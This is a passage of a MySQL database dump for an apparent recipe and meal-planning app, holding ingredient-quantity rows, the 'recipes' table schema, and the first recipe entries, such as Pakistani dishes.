300,111,NULL,7,NULL,NULL),(300,96,NULL,2,NULL,NULL),(300,206,NULL,10,NULL,NULL),(300,183,NULL,7,NULL,NULL),(391,217,NULL,250,NULL,NULL),(377,203,NULL,30,NULL,NULL),(377,52,NULL,10,NULL,NULL),(377,157,NULL,5,NULL,NULL),(377,82,NULL,25,NULL,NULL),(377,103,NULL,2,NULL,NULL),(377,93,NULL,40,NULL,NULL),(377,194,NULL,20,NULL,NULL),(377,17,NULL,3,NULL,NULL),(377,148,NULL,8,NULL,NULL),(377,86,NULL,25,NULL,NULL),(377,21,NULL,5,NULL,NULL),(377,69,NULL,5,NULL,NULL),(392,101,NULL,160,NULL,NULL),(393,95,NULL,120,NULL,NULL),(394,95,NULL,100,NULL,NULL),(395,101,NULL,150,NULL,NULL),(395,29,NULL,25,NULL,NULL),(395,91,NULL,25,NULL,NULL),(395,82,NULL,60,NULL,NULL),(395,52,NULL,20,NULL,NULL),(395,103,NULL,10,NULL,NULL),(395,157,NULL,6,NULL,NULL),(395,202,NULL,13,NULL,NULL),(395,69,NULL,10,NULL,NULL),(395,148,NULL,10,NULL,NULL),(395,135,NULL,10,NULL,NULL),(396,101,NULL,120,NULL,NULL),(397,101,NULL,80,NULL,NULL),(397,91,NULL,22,NULL,NULL),(397,52,NULL,15,NULL,NULL),(397,82,NULL,20,NULL,NULL),(397,157,NULL,4,NULL,NULL),(397,202,NULL,45,NULL,NULL),(397,69,NULL,5,NULL,NULL),(397,156,NULL,3,NULL,NULL),(397,130,NULL,10,NULL,NULL),(397,194,NULL,15,NULL,NULL),(397,105,NULL,6,NULL,NULL),(397,21,NULL,5,NULL,NULL),(397,135,NULL,3,NULL,NULL),(397,148,NULL,5,NULL,NULL),(351,92,NULL,15,NULL,NULL),(351,77,NULL,50,NULL,NULL),(351,103,NULL,5,NULL,NULL),(351,194,NULL,20,NULL,NULL),(351,202,NULL,45,NULL,NULL),(351,82,NULL,20,NULL,NULL),(351,52,NULL,15,NULL,NULL),(351,148,NULL,10,NULL,NULL),(398,211,NULL,120,NULL,NULL),(398,82,NULL,20,NULL,NULL),(398,103,NULL,5,NULL,NULL),(398,69,NULL,6,NULL,NULL),(398,224,NULL,15,NULL,NULL),(398,52,NULL,5,NULL,NULL),(398,86,NULL,15,NULL,NULL),(398,90,NULL,10,NULL,NULL),(398,157,NULL,5,NULL,NULL),(398,196,NULL,5,NULL,NULL),(398,148,NULL,5,NULL,NULL),(399,101,NULL,60,NULL,NULL),(399,161,NULL,30,NULL,NULL),(399,50,NULL,30,NULL,NULL),(399,20,NULL,30,NULL,NULL),(399,214,NULL,30,NULL,NULL),(399,59,NULL,20,NULL,NULL),(399,75,NULL,20,NULL,NULL),(399,82,NULL,30,NULL,NULL),(399,135,NULL,10,NULL,NULL),(399,189,NULL,3,NULL,NULL),(399,105,NULL,5,NULL,NULL),(399,69,NULL,5,NULL,NULL),(399,148,NULL,5,NULL,NULL),(158,202,NULL,10,NULL,NULL),(158,117,NULL,8,NULL,NULL),(158,197,NULL,5,NULL,NULL),(158,19,NULL,30,NULL,NULL),(158,148,NULL,5,NULL,NULL),(158,200,NULL,15,NULL,NULL),(378,157,NULL,2,NULL,NULL),(378,69,NULL,5,NULL,NULL),(378,17,NULL,2,NULL,NULL),(378,183,NULL,5,NULL,NULL),(378,91,NULL,10,NULL,NULL),(378,148,NULL,10,NULL,NULL),(378,194,NULL,20,NULL,NULL),(400,101,NULL,200,NULL,NULL),(400,69,NULL,5,NULL,NULL),(400,183,NULL,5,NULL,NULL),(400,194,NULL,25,NULL,NULL),(400,91,NULL,20,NULL,NULL),(400,148,NULL,10,NULL,NULL),(166,23,NULL,30,NULL,NULL),(166,93,NULL,50,NULL,NULL),(166,148,NULL,15,NULL,NULL),(166,101,NULL,80,NULL,NULL),(166,82,NULL,15,NULL,NULL),(166,52,NULL,10,NULL,NULL),(401,202,NULL,50,NULL,NULL),(402,101,NULL,30,NULL,NULL),(401,206,NULL,15,NULL,NULL),(401,224,NULL,5,NULL,NULL),(401,2,NULL,1,NULL,NULL),(401,94,NULL,25,NULL,NULL),(401,109,NULL,10,NULL,NULL),(401,175,NULL,1,NULL,NULL),(403,206,NULL,20,NULL,NULL),(403,156,NULL,2,NULL,NULL),(403,2,NULL,10,NULL,NULL),(403,5,NULL,10,NULL,NULL),(403,201,NULL,10,NULL,NULL),(403,109,NULL,100,NULL,NULL),(403,128,NULL,50,NULL,NULL),(403,202,NULL,50,NULL,NULL),(403,175,NULL,2,NULL,NULL),(403,112,NULL,2,NULL,NULL),(403,198,NULL,1,NULL,NULL),(403,94,NULL,20,NULL,NULL),(404,200,NULL,20,NULL,NULL),(405,199,NULL,7,NULL,NULL),(277,93,NULL,40,NULL,NULL),(277,82,NULL,10,NULL,NULL),(277,135,NULL,7,NULL,NULL),(277,91,NULL,5,NULL,NULL),(277,148,NULL,5,NULL,NULL),(277,194,NULL,15,NULL,NULL),(353,52,NULL,60,NULL,NULL),(353,17,NULL,10,NULL,NULL),(353,103,NULL,5,NULL,NULL),(353,194,NULL,25,NULL,NULL),(353,171,NULL,10,NULL,NULL),(353,157,NULL,5,NULL,NULL),(353,69,NULL,5,NULL,NULL),(353,148,NULL,7,NULL,NULL),(353,156,NULL,5,NULL,NULL),(44,148,NULL,4,NULL,NULL),(263,52,NULL,5,NULL,NULL),(263,82,NULL,10,NULL,NULL),(263,103,NULL,3,NULL,NULL),(263,157,NULL,4,NULL,NULL),(263,135,NULL,7,NULL,NULL),(263,148,NULL,5,NULL,NULL),(263,108,NULL,24,NULL,NULL),(57,91,NULL,25,NULL,NULL),(57,52,NULL,30,NULL,NULL),(57,148,NULL,4,NULL,NULL),(57,96,NULL,8,NULL,NULL),(57,202,NULL,35,NULL,NULL),(57,130,NULL,7,NULL,NULL),(273,29,NULL,15,NULL,NULL),(273,23,NULL,20,NULL,NULL),(273,52,NULL,10,NULL,NULL),(273,148,NULL,5,NULL,NULL),(273,197,NULL,10,NULL,NULL),(273,194,NULL,25,NULL,NULL),(273,104,NULL,4,NULL,NULL),(273,93,NULL,50,NULL,NULL),(406,101,NULL,250,NULL,NULL),(121,52,NULL,10,NULL,NULL),(121,55,NULL,10,NULL,NULL),(121,103,NULL,5,NULL,NULL),(121,206,NULL,10,NULL,NULL),(121,132,NULL,20,NULL,NULL),(121,131,NULL,10,NULL,NULL),(298,77,NULL,20,NULL,NULL),(298,55,NULL,5,NULL,NULL),(298,207,NULL,2,NULL,NULL),(298,109,NULL,50,NULL,NULL),(298,123,NULL,10,NULL,NULL),(298,131,NULL,20,NULL,NULL),(298,206,NULL,5,NULL,NULL),(298,209,NULL,12,NULL,NULL),(298,113,NULL,15,NULL,NULL),(163,123,NULL,30,NULL,NULL),(163,148,NULL,10,NULL,NULL),(163,103,NULL,3,NULL,NULL),(163,157,NULL,2,NULL,NULL),(163,194,NULL,20,NULL,NULL),(176,82,NULL,20,NULL,NULL),(176,194,NULL,5,NULL,NULL),(176,148,NULL,10,NULL,NULL),(176,123,NULL,20,NULL,NULL),(150,123,NULL,30,NULL,NULL),(150,109,NULL,50,NULL,NULL),(150,209,NULL,6,NULL,NULL),(150,5,NULL,15,NULL,NULL),(150,206,NULL,5,NULL,NULL),(148,101,NULL,120,NULL,NULL),(148,148,NULL,5,NULL,NULL),(148,91,NULL,10,NULL,NULL),(148,151,NULL,5,NULL,NULL),(148,131,NULL,10,NULL,NULL),(206,101,NULL,150,NULL,NULL),(206,55,NULL,20,NULL,NULL),(206,123,NULL,30,NULL,NULL),(206,148,NULL,15,NULL,NULL),(206,52,NULL,5,NULL,NULL),(206,91,NULL,10,NULL,NULL),(206,183,NULL,5,NULL,NULL),(407,109,NULL,100,NULL,NULL),(407,131,NULL,10,NULL,NULL),(407,132,NULL,10,NULL,NULL),(407,82,NULL,5,NULL,NULL),(407,91,NULL,5,NULL,NULL),(407,103,NULL,2,NULL,NULL),(407,206,NULL,5,NULL,NULL),(408,20,NULL,50,NULL,NULL),(408,50,NULL,50,NULL,NULL),(408,23,NULL,20,NULL,NULL),(408,21,NULL,50,NULL,NULL),(408,39,NULL,50,NULL,NULL),(408,37,NULL,20,NULL,NULL),(408,182,NULL,15,NULL,NULL),(408,123,NULL,10,NULL,NULL),(409,213,NULL,70,NULL,NULL),(410,106,NULL,40,NULL,NULL),(410,194,NULL,25,NULL,NULL),(410,92,NULL,10,NULL,NULL),(410,91,NULL,20,NULL,NULL),(410,214,NULL,20,NULL,NULL),(410,20,NULL,30,NULL,NULL),(410,50,NULL,30,NULL,NULL),(410,82,NULL,50,NULL,NULL),(410,196,NULL,5,NULL,NULL),(410,148,NULL,5,NULL,NULL),(140,109,NULL,100,NULL,NULL),(140,148,NULL,5,NULL,NULL),(140,52,NULL,10,NULL,NULL),(140,157,NULL,3,NULL,NULL),(140,101,NULL,40,NULL,NULL),(402,52,NULL,3,NULL,NULL),(402,109,NULL,100,NULL,NULL),(402,174,NULL,3,NULL,NULL),(402,91,NULL,20,NULL,NULL),(402,82,NULL,20,NULL,NULL),(402,90,NULL,12,NULL,NULL),(402,103,NULL,5,NULL,NULL),(402,128,NULL,10,NULL,NULL),(396,50,NULL,30,NULL,NULL),(396,91,NULL,30,NULL,NULL),(396,52,NULL,10,NULL,NULL),(396,103,NULL,15,NULL,NULL),(396,90,NULL,15,NULL,NULL),(396,93,NULL,40,NULL,NULL),(396,109,NULL,25,NULL,NULL),(396,156,NULL,2,NULL,NULL),(396,148,NULL,5,NULL,NULL),(396,137,NULL,30,NULL,NULL),(396,104,NULL,5,NULL,NULL),(396,96,NULL,3,NULL,NULL),(396,221,NULL,50,NULL,NULL),(396,119,NULL,5,NULL,NULL),(396,157,NULL,10,NULL,NULL),(392,157,NULL,5,NULL,NULL),(392,171,NULL,5,NULL,NULL),(392,103,NULL,20,NULL,NULL),(392,52,NULL,13,NULL,NULL),(392,194,NULL,20,NULL,NULL),(392,90,NULL,10,NULL,NULL),(392,130,NULL,5,NULL,NULL),(392,69,NULL,10,NULL,NULL),(392,156,NULL,6,NULL,NULL),(392,148,NULL,3,NULL,NULL),(411,20,NULL,100,NULL,NULL),(411,24,NULL,100,NULL,NULL),(411,82,NULL,50,NULL,NULL),(411,176,NULL,5,NULL,NULL),(411,103,NULL,2,NULL,NULL),(411,123,NULL,2,NULL,NULL),(411,131,NULL,5,NULL,NULL),(411,148,NULL,3,NULL,NULL),(412,19,NULL,50,NULL,NULL),(412,128,NULL,50,NULL,NULL),(412,174,NULL,7,NULL,NULL),(412,94,NULL,15,NULL,NULL),(412,109,NULL,50,NULL,NULL),(413,202,NULL,50,NULL,NULL),(413,206,NULL,15,NULL,NULL),(413,224,NULL,5,NULL,NULL),(413,2,NULL,1,NULL,NULL),(413,94,NULL,25,NULL,NULL),(413,109,NULL,10,NULL,NULL),(413,175,NULL,1,NULL,NULL),(413,112,NULL,1,NULL,NULL),(413,174,NULL,15,NULL,NULL),(413,199,NULL,5,NULL,NULL),(414,213,NULL,50,NULL,NULL),(414,86,NULL,10,NULL,NULL),(414,74,NULL,10,NULL,NULL),(414,50,NULL,10,NULL,NULL),(414,91,NULL,10,NULL,NULL),(414,87,NULL,10,NULL,NULL),(414,183,NULL,3,NULL,NULL),(414,148,NULL,5,NULL,NULL),(414,105,NULL,5,NULL,NULL),(414,108,NULL,70,NULL,NULL),(415,199,NULL,5,NULL,NULL),(415,174,NULL,15,NULL,NULL),(416,93,NULL,50,NULL,NULL),(416,20,NULL,40,NULL,NULL),(416,91,NULL,10,NULL,NULL),(416,82,NULL,50,NULL,NULL),(416,23,NULL,10,NULL,NULL),(416,75,NULL,20,NULL,NULL),(416,21,NULL,3,NULL,NULL),(416,194,NULL,15,NULL,NULL),(416,171,NULL,2,NULL,NULL),(416,148,NULL,5,NULL,NULL),(417,128,NULL,30,NULL,NULL),(417,174,NULL,30,NULL,NULL),(417,94,NULL,7,NULL,NULL),(417,206,NULL,2,NULL,NULL),(417,175,NULL,1,NULL,NULL),(417,39,NULL,50,NULL,NULL),(417,19,NULL,60,NULL,NULL),(418,82,NULL,70,NULL,NULL),(418,20,NULL,60,NULL,NULL),(418,76,NULL,30,NULL,NULL),(418,91,NULL,30,NULL,NULL),(418,214,NULL,30,NULL,NULL),(418,39,NULL,30,NULL,NULL),(418,55,NULL,30,NULL,NULL),(418,52,NULL,10,NULL,NULL),(418,157,NULL,3,NULL,NULL),(418,17,NULL,5,NULL,NULL),(418,171,NULL,2,NULL,NULL),(418,194,NULL,20,NULL,NULL),(418,148,NULL,3,NULL,NULL),(418,108,NULL,45,NULL,NULL),(419,20,NULL,150,NULL,NULL),(419,76,NULL,150,NULL,NULL),(419,82,NULL,150,NULL,NULL),(419,91,NULL,30,NULL,NULL),(419,23,NULL,20,NULL,NULL),(419,21,NULL,15,NULL,NULL),(419,52,NULL,20,NULL,NULL),(419,194,NULL,10,NULL,NULL),(419,216,NULL,2,NULL,NULL),(419,93,NULL,40,NULL,NULL),(419,148,NULL,2,NULL,NULL),(420,128,NULL,100,NULL,NULL),(420,82,NULL,40,NULL,NULL),(420,91,NULL,30,NULL,NULL),(420,50,NULL,15,NULL,NULL),(420,23,NULL,30,NULL,NULL),(420,21,NULL,25,NULL,NULL),(420,52,NULL,10,NULL,NULL),(420,105,NULL,10,NULL,NULL),(420,221,NULL,150,NULL,NULL),(420,157,NULL,5,NULL,NULL),(420,90,NULL,15,NULL,NULL),(420,103,NULL,5,NULL,NULL),(420,17,NULL,5,NULL,NULL),(420,148,NULL,5,NULL,NULL),(421,213,NULL,50,NULL,NULL),(421,20,NULL,100,NULL,NULL),(421,157,NULL,2,NULL,NULL),(421,17,NULL,2,NULL,NULL),(421,155,NULL,2,NULL,NULL),(421,137,NULL,5,NULL,NULL),(421,39,NULL,6,NULL,NULL),(421,121,NULL,70,NULL,NULL),(421,69,NULL,10,NULL,NULL),(421,52,NULL,3,NULL,NULL),(421,87,NULL,10,NULL,NULL),(421,130,NULL,6,NULL,NULL),(421,148,NULL,5,NULL,NULL),(255,82,NULL,25,NULL,NULL),(255,52,NULL,20,NULL,NULL),(255,103,NULL,5,NULL,NULL),(255,194,NULL,15,NULL,NULL),(255,29,NULL,50,NULL,NULL),(255,23,NULL,20,NULL,NULL),(255,50,NULL,50,NULL,NULL),(255,93,NULL,50,NULL,NULL),(422,128,NULL,100,NULL,NULL),(422,109,NULL,50,NULL,NULL),(422,94,NULL,15,NULL,NULL),(422,206,NULL,10,NULL,NULL),(422,175,NULL,2,NULL,NULL),(422,112,NULL,1,NULL,NULL),(423,205,NULL,50,NULL,NULL),(423,20,NULL,150,NULL,NULL),(423,121,NULL,35,NULL,NULL),(423,86,NULL,25,NULL,NULL),(423,82,NULL,25,NULL,NULL),(423,130,NULL,6,NULL,NULL),(423,194,NULL,15,NULL,NULL),(423,171,NULL,3,NULL,NULL),(423,148,NULL,6,NULL,NULL),(424,128,NULL,60,NULL,NULL),(424,205,NULL,30,NULL,NULL),(424,69,NULL,3,NULL,NULL),(424,171,NULL,2,NULL,NULL),(424,52,NULL,10,NULL,NULL),(424,103,NULL,2,NULL,NULL),(424,23,NULL,25,NULL,NULL),(424,50,NULL,20,NULL,NULL),(424,148,NULL,10,NULL,NULL),(425,109,NULL,70,NULL,NULL),(425,202,NULL,10,NULL,NULL),(425,19,NULL,30,NULL,NULL),(425,174,NULL,5,NULL,NULL),(425,117,NULL,5,NULL,NULL),(425,148,NULL,10,NULL,NULL),(426,128,NULL,100,NULL,NULL),(426,109,NULL,50,NULL,NULL),(426,82,NULL,20,NULL,NULL),(426,157,NULL,3,NULL,NULL),(426,171,NULL,3,NULL,NULL),(426,90,NULL,5,NULL,NULL),(426,52,NULL,15,NULL,NULL),(426,148,NULL,5,NULL,NULL),(426,94,NULL,1,NULL,NULL),(404,109,NULL,50,NULL,NULL),(404,94,NULL,15,NULL,NULL),(404,194,NULL,10,NULL,NULL),(404,175,NULL,2,NULL,NULL),(404,202,NULL,40,NULL,NULL),(404,206,NULL,3,NULL,NULL),(427,200,NULL,20,NULL,NULL),(427,109,NULL,100,NULL,NULL),(427,94,NULL,10,NULL,NULL),(427,194,NULL,10,NULL,NULL),(427,202,NULL,70,NULL,NULL),(427,206,NULL,3,NULL,NULL),(427,112,NULL,1,NULL,NULL),(427,175,NULL,1,NULL,NULL),(428,20,NULL,150,NULL,NULL),(428,82,NULL,150,NULL,NULL),(428,91,NULL,50,NULL,NULL),(428,76,NULL,50,NULL,NULL),(428,214,NULL,50,NULL,NULL),(428,174,NULL,5,NULL,NULL),(428,123,NULL,5,NULL,NULL),(428,213,NULL,20,NULL,NULL),(428,99,NULL,1,NULL,NULL),(428,202,NULL,45,NULL,NULL),(428,148,NULL,5,NULL,NULL),(429,52,NULL,10,NULL,NULL),(429,59,NULL,100,NULL,NULL),(429,75,NULL,50,NULL,NULL),(429,91,NULL,30,NULL,NULL),(429,82,NULL,70,NULL,NULL),(429,23,NULL,25,NULL,NULL),(429,50,NULL,20,NULL,NULL),(429,93,NULL,50,NULL,NULL),(429,17,NULL,3,NULL,NULL),(429,115,NULL,3,NULL,NULL),(429,96,NULL,2,NULL,NULL),(429,148,NULL,5,NULL,NULL),(429,90,NULL,10,NULL,NULL),(352,17,NULL,5,NULL,NULL),(352,100,NULL,7,NULL,NULL),(352,82,NULL,30,NULL,NULL),(352,90,NULL,20,NULL,NULL),(352,137,NULL,7,NULL,NULL),(352,157,NULL,3,NULL,NULL),(302,214,NULL,100,NULL,NULL),(302,123,NULL,10,NULL,NULL),(302,206,NULL,5,NULL,NULL),(302,109,NULL,50,NULL,NULL),(302,209,NULL,25,NULL,NULL),(302,55,NULL,10,NULL,NULL),(302,131,NULL,10,NULL,NULL),(302,132,NULL,10,NULL,NULL),(302,201,NULL,17,NULL,NULL),(287,37,NULL,70,NULL,NULL),(287,86,NULL,30,NULL,NULL),(287,111,NULL,3,NULL,NULL),(287,99,NULL,1,NULL,NULL),(287,148,NULL,4,NULL,NULL),(287,130,NULL,14,NULL,NULL),(287,94,NULL,2,NULL,NULL),(287,183,NULL,7,NULL,NULL),(287,137,NULL,2,NULL,NULL),(203,91,NULL,10,NULL,NULL),(203,52,NULL,10,NULL,NULL),(203,101,NULL,120,NULL,NULL),(203,83,NULL,10,NULL,NULL),(203,50,NULL,30,NULL,NULL),(203,106,NULL,30,NULL,NULL),(203,148,NULL,5,NULL,NULL),(203,135,NULL,12,NULL,NULL),(203,82,NULL,70,NULL,NULL),(272,161,NULL,40,NULL,NULL),(272,82,NULL,100,NULL,NULL),(272,165,NULL,2,NULL,NULL),(272,135,NULL,10,NULL,NULL),(272,148,NULL,5,NULL,NULL),(272,91,NULL,15,NULL,NULL),(272,136,NULL,4,NULL,NULL),(152,148,NULL,5,NULL,NULL),(152,206,NULL,5,NULL,NULL),(152,123,NULL,20,NULL,NULL),(152,111,NULL,5,NULL,NULL),(152,91,NULL,5,NULL,NULL),(152,55,NULL,10,NULL,NULL),(152,214,NULL,20,NULL,NULL),(152,131,NULL,15,NULL,NULL),(430,108,NULL,70,NULL,NULL),(430,94,NULL,10,NULL,NULL),(430,109,NULL,25,NULL,NULL),(430,198,NULL,1,NULL,NULL),(430,5,NULL,3,NULL,NULL),(430,148,NULL,2,NULL,NULL),(431,206,NULL,3,NULL,NULL),(431,94,NULL,7,NULL,NULL),(431,202,NULL,25,NULL,NULL),(431,109,NULL,15,NULL,NULL),(431,216,NULL,1,NULL,NULL),(409,91,NULL,10,NULL,NULL),(409,52,NULL,10,NULL,NULL),(409,74,NULL,10,NULL,NULL),(409,82,NULL,10,NULL,NULL),(409,135,NULL,5,NULL,NULL),(409,202,NULL,45,NULL,NULL),(409,148,NULL,5,NULL,NULL),(30,108,NULL,30,NULL,NULL),(30,55,NULL,5,NULL,NULL),(432,206,NULL,7,NULL,NULL),(432,201,NULL,25,NULL,NULL),(432,94,NULL,10,NULL,NULL),(432,109,NULL,50,NULL,NULL),(380,55,NULL,20,NULL,NULL),(380,29,NULL,50,NULL,NULL),(380,50,NULL,50,NULL,NULL),(380,23,NULL,30,NULL,NULL),(380,138,NULL,6,NULL,NULL),(380,137,NULL,5,NULL,NULL),(380,148,NULL,20,NULL,NULL),(380,174,NULL,3,NULL,NULL),(275,108,NULL,50,NULL,NULL),(275,171,NULL,10,NULL,NULL),(275,157,NULL,10,NULL,NULL),(275,212,NULL,20,NULL,NULL),(275,130,NULL,10,NULL,NULL),(275,87,NULL,20,NULL,NULL),(275,103,NULL,5,NULL,NULL),(405,174,NULL,150,NULL,NULL),(405,2,NULL,7,NULL,NULL),(405,5,NULL,7,NULL,NULL),(405,129,NULL,7,NULL,NULL),(405,6,NULL,7,NULL,NULL),(103,91,NULL,30,NULL,NULL),(103,50,NULL,30,NULL,NULL),(103,74,NULL,30,NULL,NULL),(103,148,NULL,5,NULL,NULL),(103,29,NULL,20,NULL,NULL),(103,52,NULL,10,NULL,NULL),(103,157,NULL,3,NULL,NULL),(84,50,NULL,50,NULL,NULL),(84,23,NULL,20,NULL,NULL),(84,21,NULL,15,NULL,NULL),(84,39,NULL,50,NULL,NULL),(84,37,NULL,50,NULL,NULL),(84,182,NULL,15,NULL,NULL),(84,123,NULL,10,NULL,NULL),(434,101,NULL,50,NULL,NULL),(434,21,NULL,10,NULL,NULL),(434,17,NULL,1,NULL,NULL),(434,97,NULL,2,NULL,NULL),(434,90,NULL,15,NULL,NULL),(434,96,NULL,3,NULL,NULL),(434,221,NULL,300,NULL,NULL),(434,109,NULL,50,NULL,NULL),(434,104,NULL,5,NULL,NULL),(434,94,NULL,2,NULL,NULL),(435,21,NULL,10,NULL,NULL),(435,50,NULL,10,NULL,NULL),(435,62,NULL,10,NULL,NULL),(435,90,NULL,15,NULL,NULL),(435,221,NULL,400,NULL,NULL),(435,97,NULL,1,NULL,NULL),(435,96,NULL,2,NULL,NULL),(435,104,NULL,4,NULL,NULL),(435,94,NULL,2,NULL,NULL),(435,17,NULL,1,NULL,NULL),(393,82,NULL,30,NULL,NULL),(393,106,NULL,50,NULL,NULL),(393,92,NULL,10,NULL,NULL),(393,194,NULL,35,NULL,NULL),(393,196,NULL,5,NULL,NULL),(393,157,NULL,5,NULL,NULL),(393,17,NULL,10,NULL,NULL),(393,52,NULL,10,NULL,NULL),(393,148,NULL,6,NULL,NULL),(202,103,NULL,5,NULL,NULL),(202,194,NULL,30,NULL,NULL),(202,82,NULL,25,NULL,NULL),(202,52,NULL,20,NULL,NULL),(202,119,NULL,2,NULL,NULL),(202,17,NULL,2,NULL,NULL),(202,202,NULL,50,NULL,NULL),(202,148,NULL,5,NULL,NULL),(436,101,NULL,130,NULL,NULL),(436,117,NULL,10,NULL,NULL),(436,96,NULL,10,NULL,NULL),(436,97,NULL,2,NULL,NULL),(436,119,NULL,2,NULL,NULL),(436,50,NULL,20,NULL,NULL),(436,93,NULL,50,NULL,NULL),(436,109,NULL,50,NULL,NULL),(436,90,NULL,15,NULL,NULL),(436,148,NULL,10,NULL,NULL),(71,86,NULL,40,NULL,NULL),(71,191,NULL,15,NULL,NULL),(71,90,NULL,10,NULL,NULL),(71,21,NULL,20,NULL,NULL),(71,182,NULL,15,NULL,NULL),(71,74,NULL,20,NULL,NULL),(437,202,NULL,25,NULL,NULL),(437,101,NULL,60,NULL,NULL),(437,52,NULL,15,NULL,NULL),(437,91,NULL,15,NULL,NULL),(437,90,NULL,10,NULL,NULL),(437,17,NULL,3,NULL,NULL),(437,130,NULL,15,NULL,NULL),(437,103,NULL,5,NULL,NULL),(437,136,NULL,3,NULL,NULL),(437,148,NULL,5,NULL,NULL),(438,101,NULL,60,NULL,NULL),(226,205,NULL,30,NULL,NULL),(226,101,NULL,20,NULL,NULL),(226,82,NULL,20,NULL,NULL),(226,74,NULL,20,NULL,NULL),(226,52,NULL,20,NULL,NULL),(226,148,NULL,4,NULL,NULL),(226,130,NULL,5,NULL,NULL),(226,76,NULL,50,NULL,NULL),(168,55,NULL,20,NULL,NULL),(168,119,NULL,3,NULL,NULL),(168,17,NULL,3,NULL,NULL),(168,178,NULL,5,NULL,NULL),(168,137,NULL,20,NULL,NULL),(168,150,NULL,5,NULL,NULL),(168,97,NULL,5,NULL,NULL),(168,148,NULL,10,NULL,NULL),(168,50,NULL,40,NULL,NULL),(168,214,NULL,25,NULL,NULL),(168,21,NULL,25,NULL,NULL),(333,77,NULL,30,NULL,NULL),(333,52,NULL,10,NULL,NULL),(333,103,NULL,5,NULL,NULL),(333,91,NULL,15,NULL,NULL),(333,74,NULL,20,NULL,NULL),(333,130,NULL,10,NULL,NULL),(333,202,NULL,30,NULL,NULL),(439,101,NULL,120,NULL,NULL),(439,93,NULL,50,NULL,NULL),(439,171,NULL,3,NULL,NULL),(439,157,NULL,3,NULL,NULL),(439,194,NULL,25,NULL,NULL),(439,82,NULL,60,NULL,NULL),(439,52,NULL,50,NULL,NULL),(439,148,NULL,15,NULL,NULL),(279,86,NULL,60,NULL,NULL),(279,59,NULL,20,NULL,NULL),(279,87,NULL,20,NULL,NULL),(279,50,NULL,25,NULL,NULL),(279,52,NULL,10,NULL,NULL),(279,103,NULL,7,NULL,NULL),(279,106,NULL,20,NULL,NULL),(279,212,NULL,5,NULL,NULL),(279,224,NULL,10,NULL,NULL),(279,47,NULL,20,NULL,NULL),(341,103,NULL,15,NULL,NULL),(341,119,NULL,10,NULL,NULL),(341,17,NULL,15,NULL,NULL),(341,90,NULL,20,NULL,NULL),(341,52,NULL,20,NULL,NULL),(341,157,NULL,5,NULL,NULL),(341,194,NULL,25,NULL,NULL),(341,148,NULL,7,NULL,NULL),(11,148,NULL,20,NULL,NULL),(11,108,NULL,30,NULL,NULL),(11,90,NULL,10,NULL,NULL),(440,171,NULL,30,NULL,NULL),(440,69,NULL,30,NULL,NULL),(440,86,NULL,25,NULL,NULL),(440,94,NULL,17,NULL,NULL),(440,221,NULL,300,NULL,NULL),(440,112,NULL,1,NULL,NULL),(441,211,NULL,250,NULL,NULL),(441,194,NULL,25,NULL,NULL),(441,69,NULL,15,NULL,NULL),(441,103,NULL,5,NULL,NULL),(441,148,NULL,5,NULL,NULL),(441,137,NULL,5,NULL,NULL),(438,21,NULL,15,NULL,NULL),(438,91,NULL,15,NULL,NULL),(438,17,NULL,5,NULL,NULL),(438,131,NULL,6,NULL,NULL),(438,130,NULL,8,NULL,NULL),(438,202,NULL,45,NULL,NULL),(438,148,NULL,3,NULL,NULL),(394,154,NULL,50,NULL,NULL),(394,52,NULL,10,NULL,NULL),(394,82,NULL,20,NULL,NULL),(394,55,NULL,20,NULL,NULL),(394,192,NULL,3,NULL,NULL),(394,183,NULL,10,NULL,NULL),(394,148,NULL,2,NULL,NULL),(394,155,NULL,2,NULL,NULL),(394,130,NULL,10,NULL,NULL),(406,171,NULL,5,NULL,NULL),(406,157,NULL,5,NULL,NULL),(406,103,NULL,5,NULL,NULL),(406,52,NULL,15,NULL,NULL),(406,194,NULL,15,NULL,NULL),(406,148,NULL,15,NULL,NULL);

--
-- Table structure for table `recipes`
--

CREATE TABLE `recipes` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `logo` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `cuisines` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `numPerson` int(11) NOT NULL DEFAULT '1',
  `description` text COLLATE utf8mb4_unicode_ci,
  `type` enum('MEAL','SAUCE','BEVERAGE','SALAD','OTHER') COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `rating` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `totalCalories` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `totalGrams` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `cover_id` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '0',
  `active` tinyint(1) NOT NULL DEFAULT '1',
  `deleted_at` timestamp NULL DEFAULT NULL,
  `created_at` timestamp NULL DEFAULT NULL,
  `updated_at` timestamp NULL DEFAULT NULL,
  `created_by` int(11) DEFAULT NULL,
  `meal_plan_category_id` int(11) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=442 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

--
-- Dumping data for table `recipes`
--

INSERT INTO `recipes` VALUES (1,'brown Rice','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:51','2019-10-05 14:01:00','2019-10-19 00:29:51',NULL,1),(2,'Pills','','Afghani',1,'Corn and flake with 3 ingredients',NULL,'0','0','0','0',1,'2019-10-19 00:29:44','2019-10-05 14:03:57','2019-10-19 00:29:44',NULL,1),(3,'Tea','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:38','2019-10-05 14:13:58','2019-10-19 00:29:38',NULL,1),(4,'Paratha','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:33','2019-10-05 14:33:17','2019-10-19 00:29:33',NULL,1),(5,'Biryani','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:16','2019-10-05 14:33:58','2019-10-19 00:29:16',NULL,1),(6,'yogert','recipes/6028f9563639244eaedff18c87415293.jpg','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:23','2019-10-05 14:34:22','2019-10-19 00:29:23',NULL,1),(7,'masoor daal','','Pakistan',1,NULL,NULL,'0','0','0','0',1,'2019-10-19 00:29:09','2019-10-05 14:35:00','2019-10-19 00:29:09',NULL,1),(8,'cold 